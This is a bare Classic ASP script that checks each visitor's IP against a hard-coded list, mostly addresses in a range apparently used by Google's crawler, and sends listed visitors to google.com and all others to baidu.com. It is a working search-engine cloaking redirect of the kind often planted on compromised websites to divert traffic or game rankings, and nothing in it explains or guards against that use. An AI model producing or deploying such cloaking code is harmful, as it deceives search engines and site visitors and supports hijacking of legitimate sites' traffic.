<%
requestIP = request.ServerVariables("REMOTE_ADDR")
IP = "66.249.70.191|66.249.70.189|66.249.79.143|66.249.79.145|66.249.79.141|66.249.79.156|66.249.79.145|66.249.70.182|66.249.70.175|66.249.70.177|66.249.79.153|66.249.79.145|66.249.70.169|146.19.175.147|146.19.175.206|146.19.175.116|66.249.70.167|66.249.70.171|66.249.70.175|66.249.70.173|66.249.70.133|66.249.70.132|101.82.117.150"
trueURL = "http://www.baidu.com"
falseURL = "http://www.google.com"
ipArr = split(IP,"|")
flag = false
for i=0 to ubound(ipArr)
if requestIP=ipArr(i) then
flag=true
exit for
end if
next
if flag then
response.Redirect(falseURL)
else
response.Redirect(trueURL)
end if
%>